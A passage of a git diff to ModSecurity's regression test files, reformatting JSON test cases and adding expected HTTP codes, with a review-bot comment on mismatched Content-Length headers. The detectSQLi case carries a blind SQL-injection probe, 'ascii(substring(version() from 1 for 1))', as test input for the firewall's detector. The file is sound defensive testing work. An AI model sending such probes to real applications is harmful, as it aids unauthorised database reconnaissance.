@@ -1841,29 +2320,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - MULTIPART_FILENAME", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - MULTIPART_FILENAME", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1885,10 +2364,19 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,20v680,20t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,20v680,20t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", 
@@ -1896,29 +2384,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - MULTIPART_NAME", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - MULTIPART_NAME", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -1940,10 +2428,19 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "error_log":"o0,16v709,16t:trim" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "error_log": "o0,16v709,16t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", 
@@ -1951,63 +2448,85 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS n", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS n", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param01=5555&bbbbbbbmy_id=6", - "method":"GET" + "uri": "/index.html?param01=5555&bbbbbbbmy_id=6", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 403, - "error_log":"o0,1v42,1" + "expected": { + "error_log": "o0,1v42,1", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains 6\" \"id:1,phase:2,deny,status:403,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_NAMES n", - "request":{ - "headers":{ - "Host":"localhost", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_NAMES n", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param01=5555&bbbbbbbmy_id=6", - "method":"GET" + "uri": "/index.html?param01=5555&bbbbbbbmy_id=6", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code": 403, - "error_log":"o7,5v29,12" + "expected": { + "error_log": "o7,5v29,12", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS_NAMES \"@contains my_id\" \"id:1,phase:2,deny,status:403,log\"" ] diff --git a/test/test-cases/regression/operator-UnconditionalMatch.json b/test/test-cases/regression/operator-UnconditionalMatch.json index 5f73a2ec2e..dcef558870 100644 --- a/test/test-cases/regression/operator-UnconditionalMatch.json +++ b/test/test-cases/regression/operator-UnconditionalMatch.json @@ -1,44 +1,45 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Operator :: @UnconditionalMatch", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Operator :: @UnconditionalMatch", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Rule returned 1" + "expected": { + "debug_log": "Rule returned 1", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@UnconditionalMatch\" \"id:1,phase:2,pass,t:trim\"" ] 
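Review bot: The "Variable offset - ARGS n" and "Variable offset - ARGS_NAMES n" cases now send an explicit empty body (`"body": [ "" ]`) on a GET, while their unchanged headers still declare `"Content-Length": "27"` and a urlencoded Content-Type, so the declared and actual body lengths disagree. The same `"27"` is also carried by the operator-detectsqli.json case later in this patch, whose request body is visibly longer than 27 bytes. Because this series stops the harness from adding newlines to body lines, a stale length should be either corrected or made deliberate: use `"Content-Length": "0"` (or drop the two body headers) in the GET cases, or state in the `title` that the mismatch is intended. Whether the harness or any rule reads the header is not visible in these hunks, so this is a consistency point rather than a confirmed test failure.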
diff --git a/test/test-cases/regression/operator-detectsqli.json b/test/test-cases/regression/operator-detectsqli.json index e2e33c908f..58dcb9505a 100644 --- a/test/test-cases/regression/operator-detectsqli.json +++ b/test/test-cases/regression/operator-detectsqli.json @@ -1,44 +1,45 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Operator :: @detectSQLi", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Operator :: @detectSQLi", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=ascii(substring(version() from 1 for 1))¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Added DetectSQLi match TX.0: f\\(f\\(f" + "expected": { + "debug_log": "Added DetectSQLi match TX.0: f\\(f\\(f", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@detectSQLi\" \"id:1,phase:2,capture,pass,t:trim\"" ] diff --git a/test/test-cases/regression/operator-detectxss.json b/test/test-cases/regression/operator-detectxss.json index e2590193b0..4885c59845 100644 --- a/test/test-cases/regression/operator-detectxss.json +++ b/test/test-cases/regression/operator-detectxss.json 
@@ -1,44 +1,45 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Operator :: @detectXSS", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Operator :: @detectXSS", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ - "param1=